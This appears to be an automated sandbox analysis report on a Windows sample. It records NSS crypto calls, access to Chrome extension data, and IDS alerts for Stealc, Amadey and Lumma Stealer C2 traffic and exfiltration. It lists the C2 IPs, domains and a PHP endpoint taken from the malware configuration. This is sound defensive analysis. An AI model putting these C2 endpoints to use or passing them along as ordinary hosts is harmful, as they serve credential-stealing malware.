Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7DA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C7E0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C7B43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C7D7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C797D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C797D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C7DBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C7D9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B3FF0 PK11_PrivDecryptPKCS1,	0_2_6C7B3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C7B3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C7B9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C7DDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E7410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	0_2_6C7E7410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C7B3560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AF050 PR_smprintf,SEC_CertNicknameConflict,strlen,realloc,memset,realloc,strlen,free,PR_smprintf,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PR_SetError,PR_GetCurrentThread,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,PK11_GenerateRandom,SECKEY_DestroyPrivateKey,PR_SetError,free,free,free,free,PK11_FindCertInSlot,PORT_NewArena_Util,free,PK11_ImportCert,PR_SetError,free,CERT_DestroyCertificate,PORT_FreeArena_Util,PR_GetCurrentThread,PORT_ArenaAlloc_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_GetCurrentThread,strlen,PR_SetError,PR_GetCurrentThread,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,PR_SetError,free,SECKEY_DestroyPrivateKey,SECKEY_DestroyEncryptedPrivateKeyInfo,PR_SetError,	0_2_6C7AF050

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.5:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.11.192.48:443 -> 192.168.2.5:50350 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2444941161.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6ca8f7e5e2.exe, 0000001C.00000002.3234613761.0000000006202000.00000040.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3134274078.0000000008340000.00000004.00001000.00020000.00000000.sdmp, 9fc857756c.exe, 00000025.00000002.3245894424.00000000005C2000.00000040.00000001.01000000.00000012.sdmp, 9fc857756c.exe, 00000025.00000003.3103554251.0000000004830000.00000004.00001000.00020000.00000000.sdmp, 9fc857756c.exe, 0000002E.00000002.3502473300.0000000000932000.00000040.00000001.01000000.00000012.sdmp, 9fc857756c.exe, 0000002E.00000003.3459258841.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2444941161.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Directory queried: number of queries: 2553

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50104 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2047626 - Severity 1 - ET MALWARE Win32/Amadey Payload Request (GET) M1 : 192.168.2.5:50122 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50116
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50124 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50127 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:64943 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:63559 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:65272 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:62063 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:57799 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50134 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54209 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50135 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50139 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50140 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50141 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50142 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50144 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50149 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:62277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:56464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:63685 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50153 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50154 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50151 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:60436 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:51739 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50155 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50150 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50159 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50160 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50162 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50163 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50165 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50175 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:62570 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50181 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50204 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:64332 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:50231 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:58636 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55979 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52614 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:63365 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50249 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50255 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50260 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50267 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50265 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50261 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:49943 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50275 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50277 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50273 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50279 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50284 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:61469 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:57859 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:51185 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:53250 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.5:50256 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50135 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50135 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50154 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50154 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50139 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50139 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50144 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50153 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50149 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50204 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50181 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50159 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50159 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50275 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50279 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50277 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50249 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50249 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50256 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50256 -> 188.114.97.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.209 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.5:49751 -> 1.1.1.1:53

